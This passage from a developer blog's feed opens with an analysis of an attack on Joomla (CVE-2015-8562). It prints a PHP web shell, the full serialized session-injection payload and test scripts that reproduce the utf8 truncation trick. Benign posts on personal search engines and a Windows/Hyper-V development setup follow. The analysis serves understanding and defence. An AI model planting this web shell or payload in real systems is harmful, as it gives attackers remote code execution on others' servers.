<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">eval</span>($_POST[<span class="hljs-number">1</span>]);<span class="hljs-meta">?&gt;</span>
</code></pre>
<p>It's a simple PHP remote shell an attacker could use to run any PHP code on the machine. But why encode it with base64? The moment I saved the file of this post containing the code above I got an alert from the antivirus software that it found a backdoor, but it couldn't be bothered by the base64 encoded string.</p>
<p>The problem is that the original HTTP request wasn't for the <code>webconfig.txt.php</code> file so the remote shell couldn't run the code it got from the <code>1</code> parameter. And anyway, why would they send a command to the remote shell to create itself? There must be some naughtiness in the user agent.</p>
<h3>Code reuse</h3>
<p>After a bit of formatting and decoding, we got this:</p>
<pre><code>}__test|O:21:&quot;JDatabaseDriverMysqli&quot;:3:{
  s:2:&quot;fc&quot;;O:17:&quot;JSimplepieFactory&quot;:0:{}
  s:21:&quot;\0\0\0disconnectHandlers&quot;;a:1:{
    i:0;a:2:{
      i:0;O:9:&quot;SimplePie&quot;:5:{
        s:8:&quot;sanitize&quot;;O:20:&quot;JDatabaseDriverMysql&quot;:0:{}
        s:8:&quot;feed_url&quot;;s:46:&quot;eval($_REQUEST[1]);JFactory::getConfig();exit;&quot;;
        s:19:&quot;cache_name_function&quot;;s:6:&quot;assert&quot;;
        s:5:&quot;cache&quot;;b:1;
        s:11:&quot;cache_class&quot;;O:20:&quot;JDatabaseDriverMysql&quot;:0:{}
      }
      i:1;s:4:&quot;init&quot;;
    }
  }
  s:13:&quot;\0\0\0connection&quot;;b:1;
}\xF0\x9D\x8C\x86
</code></pre>
<p>There is no shortage of naughtiness here, that's for sure. It starts with a <code>}</code> character right away. That could be part of some kind of injection and they try to close the previous value with it.</p>
<p>The next part could remind experienced PHP developers of the output of the <code>serialize</code> function, but it's not quite the right format. The <code>session_encode</code> function has such a result and PHP stores the content of the session with this encoding. There is a strange <code>\xF0\x9D\x8C\x86</code> part at the end as well. I couldn't figure that out yet, but I'm sure it's up to no good.</p>
<p>It looks like they try to create a new variable in the session through the <code>User-Agent</code> header. This new <code>__test</code> variable would be an instance of the <code>JDatabaseDriverMysqli</code> class. It has an active connection (<code>connection</code> is <code>true</code>) and a disconnect handler, the <code>init</code> method should be called on an instance of the <code>SimplePie</code> class in case of disconnect. This already sounds a bit strange, but if we take a look at the value of the <code>feed_url</code>, it gets more suspicious:</p>
<pre><code class="hljs php"><span class="hljs-keyword">eval</span>($_REQUEST[<span class="hljs-number">1</span>]);JFactory::getConfig();<span class="hljs-keyword">exit</span>;
</code></pre>
<p>Yet another remote shell, just to be sure.</p>
<h3>Deep in the Joomla</h3>
<p>With the help of the class names starting with a <code>J</code>, we could figure out that it's about <a href="https://www.joomla.org/">Joomla</a>. With a bit more research we could even find <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562">the vulnerability</a> as well which contains the exact version. Now we can check out the source code. The <a href="https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/database/driver/mysqli.php#L199">relevant part of the <code>JDatabaseDriverMysqli</code> class</a>:</p>
<pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span><span class="hljs-params">()</span>
</span>{
    <span class="hljs-keyword">$this</span>-&gt;disconnect();
}

<span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">disconnect</span><span class="hljs-params">()</span>
</span>{
    <span class="hljs-keyword">if</span> (<span class="hljs-keyword">$this</span>-&gt;connection)
    {
        <span class="hljs-keyword">foreach</span> (<span class="hljs-keyword">$this</span>-&gt;disconnectHandlers <span class="hljs-keyword">as</span> $h)
        {
            call_user_func_array($h, <span class="hljs-keyword">array</span>( &amp;<span class="hljs-keyword">$this</span>));
        }

        mysqli_close(<span class="hljs-keyword">$this</span>-&gt;connection);
    }

    <span class="hljs-keyword">$this</span>-&gt;connection = <span class="hljs-keyword">null</span>;
}
</code></pre>
<p>Before the removal of the object, it calls the <code>disconnect</code> method which runs all the disconnect handlers. In our case the <a href="https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/simplepie/simplepie.php#L1504"><code>init</code> method of our suspicious <code>SimplePie</code> class</a>:</p>
<pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">init</span><span class="hljs-params">()</span>
</span>{
    <span class="hljs-comment">// ...</span>

    $cache = call_user_func(
        <span class="hljs-keyword">array</span>(<span class="hljs-keyword">$this</span>-&gt;cache_class, <span class="hljs-string">'create'</span>),
        <span class="hljs-keyword">$this</span>-&gt;cache_location,
        call_user_func(<span class="hljs-keyword">$this</span>-&gt;cache_name_function, <span class="hljs-keyword">$this</span>-&gt;feed_url),
        <span class="hljs-string">'spc'</span>
    );

    <span class="hljs-comment">// ...</span>
}
</code></pre>
<p>The interesting part for us is that it calls the <code>cache_name_function</code> with the <code>feed_url</code> as the parameter. With the data from the user agent, this would end up as the following function call:</p>
<pre><code class="hljs php">call_user_func(<span class="hljs-string">'assert'</span>, <span class="hljs-string">'eval($_REQUEST[1]);JFactory::getConfig();exit;'</span>);
</code></pre>
<p>It's quite an old vulnerability so it depends on the behaviour of the <code>assert</code> function before PHP 8.0.0. It runs the string it got as PHP code and checks the result. So this call would run the PHP code it got in the GET parameter.</p>
<p>We managed to solve the request, it's time to summarize what we found out:</p>
<ul>
<li>there is a PHP code in a GET parameter that would create a remote shell if it runs</li>
<li>the content of the user agent looks like an injection that would create a new variable in the session</li>
<li>the new variable is a carefully crafted object structure that would run the code in the GET parameter during the removal of the object</li>
</ul>
<p>Joomla at some point <a href="https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/session/session.php#L1017">puts the user agent into the session</a>. Depending on the configuration this session could be stored in many places, but the default setting is that it <a href="https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/session/storage/database.php#L77">gets saved in a MySQL table with the MySQLi driver</a>. Another important detail here is that it <a href="https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/database/driver/mysqli.php#L675">sets the character set of the database connection to <code>utf8</code></a> (and most likely the database and the tables have the same <code>utf8</code> character set as well). But how would we end up with an injection?</p>
<h3>Strange behaviors</h3>
<p>We have two suspects remaining: the session handling of PHP and the data storage in MySQL. Let's start with the PHP. Here is a simple example to see how the <code>session_encode</code> works:</p>
<pre><code class="hljs php">session_start();

$_SESSION[<span class="hljs-string">'foo'</span>] = <span class="hljs-keyword">array</span>();
$_SESSION[<span class="hljs-string">'bar'</span>] = <span class="hljs-string">'something'</span>;

<span class="hljs-keyword">print</span>(session_encode() . <span class="hljs-string">"\n"</span>);
</code></pre>
<pre class="console"><code>$ docker run --rm --volume $(pwd):/app --workdir /app php:5.3.29 php test.php
foo|a:0:{}bar|s:9:&quot;something&quot;;
</code></pre>
<p>Now that we roughly know what the expected output looks like we can try to add some naughtiness to it:</p>
<pre><code class="hljs php">session_start();

$_SESSION[<span class="hljs-string">'foo'</span>] = <span class="hljs-keyword">array</span>();
$_SESSION[<span class="hljs-string">'evil'</span>] = <span class="hljs-string">"}__test|O:8:\"stdClass\":1:{s:4:\"evil\";b:1;}\xF0\x9D\x8C\x86"</span>;
$_SESSION[<span class="hljs-string">'bar'</span>] = <span class="hljs-string">'something'</span>;

<span class="hljs-keyword">print</span>(session_encode() . <span class="hljs-string">"\n"</span>);
</code></pre>
<pre class="console"><code>$ docker run --rm --volume $(pwd):/app --workdir /app php:5.3.29 php test.php
foo|a:0:{}evil|s:46:&quot;}__test|O:8:&quot;stdClass&quot;:1:{s:4:&quot;evil&quot;;b:1;}𝌆&quot;;bar|s:9:&quot;something&quot;;
</code></pre>
<p>Nothing exciting yet, it just runs <code>serialize</code> on our naughtiness. Even the strange <code>\xF0\x9D\x8C\x86</code> string turned out to be just a 4-byte UTF-8 character. But what happens if we try to decode this data?</p>
<pre><code class="hljs php">$data = session_encode();

$_SESSION = <span class="hljs-keyword">array</span>();
session_decode($data);

var_dump($_SESSION);
</code></pre>
<pre class="console"><code>$ docker run --rm --volume $(pwd):/app --workdir /app php:5.3.29 php test.php
array(3) {
  [&quot;foo&quot;]=&gt;
  array(0) {
  }
  [&quot;evil&quot;]=&gt;
  string(46) &quot;}__test|O:8:&quot;stdClass&quot;:1:{s:4:&quot;evil&quot;;b:1;}𝌆&quot;
  [&quot;bar&quot;]=&gt;
  string(9) &quot;something&quot;
}
</code></pre>
<p>Absolutely nothing extraordinary. It's so disappointing. Maybe that <code>\xF0\x9D\x8C\x86</code> part is related to MySQL. Let's start a server and check it out.</p>
<pre class="file"><code>docker-compose.yml
</code></pre>
<pre><code class="hljs yaml"><span class="hljs-attr">version:</span> <span class="hljs-string">'3'</span>
<span class="hljs-attr">services:</span>
  <span class="hljs-attr">app:</span>
    <span class="hljs-attr">image:</span> <span class="hljs-string">php:5.3.29</span>
    <span class="hljs-attr">volumes:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">.:/app</span>
    <span class="hljs-attr">working_dir:</span> <span class="hljs-string">/app</span>
  <span class="hljs-attr">db:</span>
    <span class="hljs-attr">image:</span> <span class="hljs-string">mysql:5.6.51</span>
    <span class="hljs-attr">environment:</span>
      <span class="hljs-attr">MYSQL_ROOT_PASSWORD:</span> <span class="hljs-string">secret</span>
      <span class="hljs-attr">MYSQL_DATABASE:</span> <span class="hljs-string">test</span>
</code></pre>
<p>Our little test script connects to the database, sets the character set of the connection to <code>utf8</code>, creates a table with the same character set, and inserts a row that contains our naughty little byte sequence in the middle. And finally, we read the data back.</p>
<pre><code class="hljs php">$db = <span class="hljs-keyword">new</span> mysqli(<span class="hljs-string">'db'</span>, <span class="hljs-string">'root'</span>, <span class="hljs-string">'secret'</span>, <span class="hljs-string">'test'</span>);
$db-&gt;set_charset(<span class="hljs-string">'utf8'</span>);

$db-&gt;query(<span class="hljs-string">"CREATE TABLE test (id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY, data TEXT NOT NULL) CHARACTER SET utf8"</span>);

$stmt = $db-&gt;prepare(<span class="hljs-string">"INSERT INTO test (data) VALUES (?)"</span>);

$data = <span class="hljs-string">"foo\xF0\x9D\x8C\x86bar"</span>;

$stmt-&gt;bind_param(<span class="hljs-string">'s'</span>, $data);
$stmt-&gt;execute();

$result = $db-&gt;query(<span class="hljs-string">"SELECT * FROM test"</span>);
var_dump($result-&gt;fetch_assoc());

$db-&gt;query(<span class="hljs-string">"DROP TABLE test"</span>);
</code></pre>
<pre class="console"><code>$ docker-compose run --rm app php test.php
array(2) {
  [&quot;id&quot;]=&gt;
  string(1) &quot;1&quot;
  [&quot;data&quot;]=&gt;
  string(3) &quot;foo&quot;
}
</code></pre>
<p>At long last, something is happening. Part of the original data with our naughty string vanished.</p>
<p>The trick is that the <code>utf8</code> character set (its full name is <code>utf8mb3</code>, also known as <a href="https://dev.mysql.com/doc/refman/5.7/en/charset-unicode-utf8mb3.html">3-Byte UTF-8 Unicode Encoding</a>) isn't able to handle 4-byte UTF-8 characters (there is another character set for that called <code>utf8mb4</code>). If it encounters such a byte sequence it discards it with the rest of the data as well. It only stores the data up until the invalid character.</p>
<p>Let's look at the <code>session_decode</code> again to see what would happen if we simulate this behavior:</p>
<pre><code class="hljs php">$data = session_encode();
$data = substr($data, <span class="hljs-number">0</span>, strpos($data, <span class="hljs-string">"\xF0\x9D\x8C\x86"</span>));

$_SESSION = <span class="hljs-keyword">array</span>();
session_decode($data);

var_dump($_SESSION);
</code></pre>
<pre class="console"><code>$ docker run --rm --volume $(pwd):/app --workdir /app php:5.3.29 php test.php
array(3) {
  [&quot;foo&quot;]=&gt;
  array(0) {
  }
  [&quot;evil&quot;]=&gt;
  NULL
  [&quot;46:&quot;}__test&quot;]=&gt;
  object(stdClass)#1 (1) {
    [&quot;evil&quot;]=&gt;
    bool(true)
  }
}
</code></pre>
<p>Looks like PHP handles incomplete session data rather poorly. With that, we finally have the last piece of the puzzle in its place. We managed the reproduce the behavior that leads to the creation of a remote shell on the server by that remarkably strange HTTP request.</p>
<p>Observant readers may have spotted that I used quite an old version of PHP and MySQL in the examples. The reason is simple, in more recent versions this would not work.</p>
<p>Inserting our naughty little byte sequence in MySQL 5.7.42:</p>
<pre class="console"><code>$ docker-compose run --rm app php test.php
Fatal error: Uncaught exception 'mysqli_sql_exception' with message 'Incorrect string value: '\xF0\x9D\x8C\x86ba...' for column 'data' at row 1' in /app/test.php:14
Stack trace:
#0 /app/test.php(14): mysqli_stmt-&gt;execute()
#1 {main}
  thrown in /app/test.php on line 14
</code></pre>
<p>Decoding mangled session data in PHP 5.4.45:</p>
<pre class="console"><code>$ docker run --rm --volume $(pwd):/app --workdir /app php:5.4.45 php test.php
Warning: session_decode(): Failed to decode session object. Session has been destroyed in /app/test.php on line 43
array(1) {
  [&quot;foo&quot;]=&gt;
  array(0) {
  }
}
</code></pre>
<h3>Summary</h3>
<p>It was a long journey, let's review what it took to exploit this vulnerability:</p>
<ul>
<li>an older version of PHP and MySQL (at the time of the publication of this vulnerability PHP 5.4 and MySQL 5.7 have been available for years)</li>
<li>storing the session in MySQL in a table with a <code>utf8</code> character set and with a database connection with a <code>utf8</code> character set as well</li>
<li>storing untrusted user data in the session</li>
<li>the existence of classes in the code that, if combined in an unusual way, will eventually successfully execute a string as PHP code</li>
</ul>
<p>What's the lesson learned? I don't know... things could go sideways even if you do everything right? In any case, remember this little investigation the next time you think that a potential vulnerability (be it in a library you use, the interpreter of your language of choice, or the database) cannot be exploited through your code.</p>
<h3>Further reading</h3>
<ul>
<li><a href="https://websec.files.wordpress.com/2010/11/rips_ccs.pdf">Code Reuse Attacks in PHP: Automated POP Chain Generation</a></li>
<li><a href="https://blog.cloudflare.com/the-joomla-unserialize-vulnerability/">A Different Kind of POP: The Joomla Unserialize Vulnerability</a></li>
<li><a href="https://www.owasp.org/index.php/PHP_Object_Injection">OWASP: PHP Object Injection</a></li>
</ul>

]]></content:encoded>
        </item>
            <item>
            <title>Needle in the haystack</title>
            <link>https://deadlime.hu/en/2023/07/01/needle-in-the-haystack/</link>
            <pubDate>Sat, 01 Jul 2023 15:34:12 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[search]]></category>
                    
            <guid isPermaLink="false">de1785abbd1ea4434a9c5e0ef35eded4</guid>
            <description>Is it just a dream to have your own search engine?</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/crawler.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>Our topic for today, dear reader, is a little thought experiment: what if everyone had their own personalized (even local) search engine, instead of having to use central providers (DuckDuckGo, Google, Bing, and others)?</p>
<p>Obviously, from a privacy perspective, it would be a huge step forward if giant corporations wouldn't be able to collect who knows what kind of data about everyone in the world, and then to do who knows what with it. But is it technologically feasible?</p>
<h3>The search engine</h3>
<p>Before we get into details, let's take a broad look at how a search engine might work.</p>
<h4>Download</h4>
<p>There are programs called crawlers that visit a page, download its HTML source, extract links from it, visit those pages as well, extract links from them, and so on. Well-behaving crawlers respect the <a href="https://en.wikipedia.org/wiki/Robots.txt">robots.txt</a> and site owners can make their work easier by creating a <a href="https://en.wikipedia.org/wiki/Sitemaps">sitemap.xml</a>.</p>
<h4>Processing</h4>
<p>From the many-many HTML source files, data should be extracted. Most likely we would also need some context about where the text was found (e.g. page header or footer text), which can then be used later for ordering our search results. Additional metadata can be extracted if the website is using <a href="https://en.wikipedia.org/wiki/Facebook_Platform#Open_Graph_protocol">Open Graph</a>, <a href="https://en.wikipedia.org/wiki/Microformat">Microformats</a>, or <a href="https://en.wikipedia.org/wiki/Schema.org">Schema.org</a> protocols.</p>
<h4>Storage</h4>
<p>We have a couple of options here, based on the amount of data we are willing to store. We will definitely need an index that tells us all the pages that contain a word or phrase. If we also want to display the context where we found that phrase on the results page, we also need to store the data extracted by the processing step. If we want to display the web page from which the index was generated, we will need to store the full HTML page as well.</p>
<h4>Search</h4>
<p>A (web) application that converts a search term entered by a user into a database query and displays the results.</p>
<h3>Download the Internet</h3>
<p>So our first problem is the crawler. According to the Internet, there are roughly 400 million active websites today. Even if each of them has only 10 pages (probably a huge underestimation), we are talking about 4 billion pages we need to visit. If we can download every page in 100ms and extract links from it (also a highly optimistic estimate), it would take a crawler more than 12 years to visit everything. A thousand parallel crawlers could finish in 4-5 days... but it sure would be exciting to see billions of people sending thousands of crawlers to the Internet to build their own index.</p>
<p>And that was a very optimistic estimate. How much?</p>
<p>Just think about the fact that nowadays the f...antastic developers like to build websites that are unable to work without downloading and running (multiple megabytes of) JavaScript. So we might need a headless browser to extract the final HTML, which certainly won't finish in 100ms. That would be at least one (but maybe more like two) orders of magnitude slower.</p>
<p>Processing at this scale would also probably be too time-consuming and resource-intensive. Even if they would all be hand-crafted, minimalistic, syntactically, and semantically correct HTML pages... but obviously this is far from the reality. And then there are the SEO tricks, like text that is invisible to the user but present to the crawler and similar naughty things. We should filter out those as well.</p>
<p>Storage has similar problems. Google claims that its index is over 100,000,000 gigabytes in size. Even if it's mostly images and videos, this is way too much to store comfortably on a desktop computer. So it seems that there are problems with three of the four parts (download, processing, and storage). We are up to a bad start.</p>
<h3>Alternative solutions</h3>
<p>The overload caused by the crawlers could be solved by allowing crawlers to talk to each other about who has been where and exchange information. Although I don't know how we could do this safely so that a rogue crawler can't poison others with false information. And this doesn't help with the amount of data either.</p>
<p>But do we really need the <em>whole</em> Internet? Chances are that we are only interested in content in one or two languages other than our own, and we wouldn't need all of that data either. If we could somehow pick that one percent of the Internet we are interested in, then maybe we could make our own search engine work. We could enter pages into our personal search engine that we think are important enough to crawl, and then go through the external links on those sites, and so on. In the end, we would have a manageable amount of HTML files that could probably be stored on our computer.</p>
<p>In the end, however, it doesn't seem economical (or even possible) to have everyone run their own crawlers and produce their own index, but that doesn't necessarily mean that everyone can't have their own copy of the index. There could be, say, some open index format or database structure and anyone could publish their own indices.</p>
<p>The possibilities are endless, but let's take a look at some ideas for inspiration:</p>
<ul>
<li>thematic indices, like an index for programmers, with documentations, StackOverflow, and more</li>
<li>big sites could publish their own index of their content (no crawling is needed, but in return, you trust them that the index and the real content of the site are the same)</li>
<li>location-based indices, when you need to find all the ice cream shops in Prague</li>
<li>companies that produce paid indices</li>
<li>libraries, and public organizations that would make indices of content in their own language</li>
<li>indices of non-profit organizations, such as archive.org, which already has such data anyway</li>
<li>frequently updated news-like indices</li>
<li>infrequently updated encyclopedia-like indices</li>
<li>the index of your neighbor Joe, which is created from his favorite websites</li>
</ul>
<p>Users could load the indices of their choice into their personal search engine, deleting parts that are not relevant to them to save space or get better results. During the search, they could choose which indices to search in.</p>
<p>From here on, the choice of index providers would determine the quality of the results. I suppose, over time, the good providers would rise to the top, and there would be know-how about index customizations. Any time when the quality of an index deteriorates, or it's not fresh enough, one would have the option to look for a new provider. And for the more tech-savvy, there would still be the option to start their own crawler and build their own index (which they can then sell to others).</p>
<p>Not much has been said about the search interface itself, but that part seems pretty straightforward. Since the index/database has an open format, anyone could build software on it. There would probably be some great open-source alternatives, either as a desktop application or as a web application that could be self-hosted on a server. And there would be plug-ins for these applications that could add calculators, currency converters, search history, and who knows what else to the basic functionality.</p>
<h3>Summary</h3>
<p>I have a few more little ideas here and there, but I didn't want to ramble too much. Let's get back to the original question. Is it just a dream to have your own search engine? If you want to search the whole Internet: yes. But you don't necessarily need the whole Internet to be happy (or to have a search engine that works well). With the right index providers and index sizes that are acceptable to the end user, I think it could work.</p>

]]></content:encoded>
        </item>
            <item>
            <title>Beyond the Windows</title>
            <link>https://deadlime.hu/en/2023/06/24/beyond-the-windows/</link>
            <pubDate>Sat, 24 Jun 2023 14:04:18 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Docker]]></category>
                    <category><![CDATA[Samba]]></category>
                    <category><![CDATA[GnuPG]]></category>
                    <category><![CDATA[Hyper-V]]></category>
                    <category><![CDATA[Windows]]></category>
                    <category><![CDATA[development]]></category>
                    
            <guid isPermaLink="false">1a2cc222b96372f72fb72d6e8f7a0796</guid>
            <description>A guided tour of my development environment</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/developers.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>
<p class="image-caption">Web developers at work; late work of Leonardo da Vinci</p>

<p>Sometimes I feel like an endangered species among all the half-eaten apples, so I'll tell you a little bit about what my development environment looks like as a (web) developer on Windows.</p>
<blockquote>
<p><em>As the rays of the Sun slowly penetrate the three layers of tempered glass, one of the most extraordinary creatures in the northern hemisphere can be seen - Scriptor fenestralis, better known as the web developer on Windows.</em><br />
<br />
<em>Their natural habitat is an ideal combination of artificial lighting and cool temperatures, creating an optimal environment for mentally challenging work.</em></p>
</blockquote>
<p>In short: it's a Windows host machine running a Debian-based virtual machine with Hyper-V. Within that, I use Docker to run specific projects. It's not fancy technology by any stretch of the imagination, but I haven't had the urge to experiment with WSL2 more seriously. But let's get into the details.</p>
<h3>The physical machine</h3>
<p>I used to use VirtualBox, but then I switched to Hyper-V, because it's already included in Windows, you just have to turn it on. Also, I thought, if it's an official virtualization platform, it might work better. I don't have anything to back this up, one thing I can think of is that the virtual machine starts when the machine starts, but maybe you could do that with VirtualBox as well.</p>
<h4>Networking</h4>
<p>If you want to access your virtual machine (or the Internet from your virtual machine), you need to set up a network for it. Here we can go in two directions, we can use either an <code>External switch</code> or an <code>Internal switch</code> (there is also a <code>Private switch</code>, but that doesn't help us now).</p>
<p>On my desktop machine, I went with the <code>External switch</code> option, connected it with the network card that the machine gets Internet on and that's pretty much it. The virtual machine also appears to the router as if it were a physical machine on the network. Based on its MAC address, I gave it a fixed IP address on the DHCP server and a host on the DNS server that resolves to that IP address (<code>devbox.lan</code>).</p>
<p>This may be an acceptable solution for a desktop machine that is rarely moved, but what about a laptop for example where you may not have access to all the routers to configure this? An <code>Internal switch</code> could work in this case. I configured it with the following PowerShell commands:</p>
<pre><code class="hljs powershell">&gt; <span class="hljs-built_in">New-VMSwitch</span> <span class="hljs-literal">-SwitchName</span> <span class="hljs-string">"Internal"</span> <span class="hljs-literal">-SwitchType</span> Internal
&gt; <span class="hljs-built_in">New-NetIPAddress</span> <span class="hljs-literal">-IPAddress</span> <span class="hljs-number">192.168</span>.<span class="hljs-number">56.1</span> <span class="hljs-literal">-PrefixLength</span> <span class="hljs-number">24</span> <span class="hljs-literal">-DefaultGateway</span> <span class="hljs-number">192.168</span>.<span class="hljs-number">56.1</span> <span class="hljs-literal">-InterfaceAlias</span> <span class="hljs-string">"vEthernet (Internal)"</span>
&gt; <span class="hljs-built_in">New-NetNAT</span> <span class="hljs-literal">-Name</span> <span class="hljs-string">"InternalNatNetwork"</span> <span class="hljs-literal">-InternalIPInterfaceAddressPrefix</span> <span class="hljs-number">192.168</span>.<span class="hljs-number">56.0</span>/<span class="hljs-number">24</span>
</code></pre>
<p>We are using the <code>192.168.56.0/24</code> subnet, but without DHCP we don't get an IP address automatically. We have to specify a fixed IP address inside the virtual machine. For Debian, something like this in <code>/etc/network/interfaces</code> should work:</p>
<pre><code class="hljs yaml"><span class="hljs-string">iface</span> <span class="hljs-string">eth0</span> <span class="hljs-string">inet</span> <span class="hljs-string">static</span>
  <span class="hljs-string">address</span> <span class="hljs-number">192.168</span><span class="hljs-number">.56</span><span class="hljs-number">.101</span>
  <span class="hljs-string">netmask</span> <span class="hljs-number">255.255</span><span class="hljs-number">.255</span><span class="hljs-number">.0</span>
  <span class="hljs-string">gateway</span> <span class="hljs-number">192.168</span><span class="hljs-number">.56</span><span class="hljs-number">.1</span>
</code></pre>
<p>If you also need a host for it, you can add the following line to the <code>C:\Windows\System32\drivers\etc\hosts</code> file:</p>
<pre><code>192.168.56.101 devbox.lan
</code></pre>
<p>Sometimes it is necessary to access a port of the virtual machine on <code>localhost</code> (if something inside the virtual machine is running on port 8080, I can access it on <code>localhost:8080</code>). To do this, I initially used the following PowerShell command:</p>
<pre><code class="hljs powershell">&gt; <span class="hljs-built_in">Add-NetNatStaticMapping</span> <span class="hljs-literal">-NatName</span> <span class="hljs-string">"InternalNatNetwork"</span> <span class="hljs-literal">-Protocol</span> TCP <span class="hljs-literal">-ExternalIPAddress</span> <span class="hljs-number">0.0</span>.<span class="hljs-number">0.0</span> <span class="hljs-literal">-InternalIPAddress</span> <span class="hljs-number">192.168</span>.<span class="hljs-number">56.101</span> <span class="hljs-literal">-InternalPort</span> <span class="hljs-number">8080</span> <span class="hljs-literal">-ExternalPort</span> <span class="hljs-number">8080</span>
</code></pre>
<p>This started to not work after a while. I don't know what happened to it, but after some digging, I found another command instead.</p>
<pre><code class="hljs powershell">&gt; netsh interface portproxy add v4tov4 listenport=<span class="hljs-number">8080</span> listenaddress=<span class="hljs-number">0.0</span>.<span class="hljs-number">0.0</span> connectport=<span class="hljs-number">8080</span> connectaddress=<span class="hljs-number">192.168</span>.<span class="hljs-number">56.101</span>
</code></pre>
<p>In hindsight, it might have been easier to just use SSH port forwarding. What a delightful discovery to make during writing this post.</p>
<h4>GUI applications</h4>
<p>The physical machine is running <a href="https://sourceforge.net/projects/vcxsrv/">VcXsrv</a>, which is an X server running on Windows. Within the virtual Linux, I can use it to launch windowed applications that can be used as Windows applications. Usually the IDE I'm currently using runs inside the virtual machine with this method because it's easier to access Linux/Docker stuff inside the virtual machine and there are fewer problems around file permissions.</p>
<h4>SSH</h4>
<p>I use a GPG key stored on a <a href="https://www.yubico.com/products/yubikey-5-overview/">YubiKey</a> for SSH authentication. The GPG agent in <a href="https://www.gpg4win.org/">Gpg4win</a> is configured to both handle the YubiKey and to offer the key to the SSH agent:</p>
<pre class="file"><code>scdaemon.conf
</code></pre>
<pre><code>reader-port Yubico Yubi
pcsc-shared
disable-application piv
</code></pre>
<pre class="file"><code>gpg-agent.conf
</code></pre>
<pre><code>enable-ssh-support
enable-putty-support
</code></pre>
<p><a id="cite_ref-1"></a>PuTTY is used as SSH client (although Windows Terminal is quite promising, but last time I checked it didn't want to work with the GPG agent). Agent forwarding<a href="#cite_note-1" class="note"><sup>[1]</sup></a> is enabled so that the virtual machine can use the key on the YubiKey.</p>
<p>Also, my Linux home directory is mounted as a network drive (<code>P:\</code>) to make it easier to move files between the two machines.</p>
<h3>The virtual machine</h3>
<p>This part is pretty basic, a simple Debian or Ubuntu server that I set up using Ansible. After SSHing in, I'm greeted by a Bash with the default settings (apart from a few aliases) and I usually start a <a href="https://github.com/tmux/tmux#readme">Tmux</a> alongside. If I'm in the mood, I'll use <a href="https://github.com/powerline/powerline">Powerline</a> (and its associated <a href="https://github.com/powerline/fonts/tree/master/DejaVuSansMono">DejaVu Sans Mono</a> font) to make them look fancy a bit.</p>
<h4>Samba</h4>
<p>There is a Samba on the machine because of the network drive. I found some <a href="https://www.google.com/search?hl=en&amp;q=samba%20performance%20tuning">performance-boosting settings on the net</a> that I use with it:</p>
<pre class="file"><code>/etc/samba/smb.conf
</code></pre>
<pre><code>read raw = yes
write raw = yes
socket options = TCP_NODELAY IPTOS_LOWDELAY SO_RCVBUF=131072 SO_SNDBUF=131072 SO_KEEPALIVE
use sendfile = yes
aio read size = 16384
aio write size = 16384
oplocks = yes
max xmit = 65535
dead time = 15
getwd cache = yes
</code></pre>
<h4>Docker</h4>
<p>Last but not least, Docker is added for the projects. All the other stuff will hopefully run inside Docker. Speaking of Docker, we should talk a bit about its network setup.</p>
<p>If you let it run wild, there's a small chance that sooner or later it will create a network that conflicts with one of your other local networks and things will start to get weird. To prevent this, it's worth adding something like this to your settings:</p>
<pre class="file"><code>/etc/docker/daemon.json
</code></pre>
<pre><code class="hljs json">{
  <span class="hljs-attr">"bip"</span>: <span class="hljs-string">"172.20.0.1/16"</span>,
  <span class="hljs-attr">"default-address-pools"</span>: [
    {<span class="hljs-attr">"base"</span>: <span class="hljs-string">"172.21.0.0/16"</span>, <span class="hljs-attr">"size"</span>: <span class="hljs-number">24</span>}
  ]
}
</code></pre>
<p>So you can have ~250 networks with ~250 machines per network, which is probably more than enough for a development machine, but you can add more domains to the <code>default-address-pools</code> section if you run out of them.</p>
<p>That brings us to the end of the tour, I hope you enjoyed the trip. We've scratched the surface of quite a lot of things, but this is probably enough to get you started on this bumpy road.<br />
Having said that, I can probably admit now that I'm not sure I could recommend this setup to anyone. I am comfortable with it enough not to change for the time being, but I am still looking for other possible alternatives.</p>
<hr />
<h3>Notes</h3>
<p><a id="cite_note-1"></a>1. <a href="#cite_ref-1" class="note">↑</a> It is often said that agent forwarding is not a good idea, because the socket will be available to others on the target machine if they have enough privileges (e.g. root), but this is not a threat in our case.</p>

]]></content:encoded>
        </item>
            <item>
            <title>Rolled by the machine</title>
            <link>https://deadlime.hu/en/2023/04/06/rolled-by-the-machine/</link>
            <pubDate>Wed, 05 Apr 2023 22:16:30 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[ChatGPT]]></category>
                    <category><![CDATA[Rust]]></category>
                    <category><![CDATA[email]]></category>
                    <category><![CDATA[Feed]]></category>
                    
            <guid isPermaLink="false">5dbaf67e249bc7e14f4ef8bfc86684fc</guid>
            <description>Let ChatGPT do the programming</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/ai.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>
<p class="image-caption"><a href="https://www.midjourney.com/">Midjourney</a> generated this image for us</p>

<p>I'm thinking about this idea for a while now about alternative uses of the mailbox. The base of the idea is that you can create arbitrary email-like things in your account via the IMAP protocol, without actually sending any emails.</p>
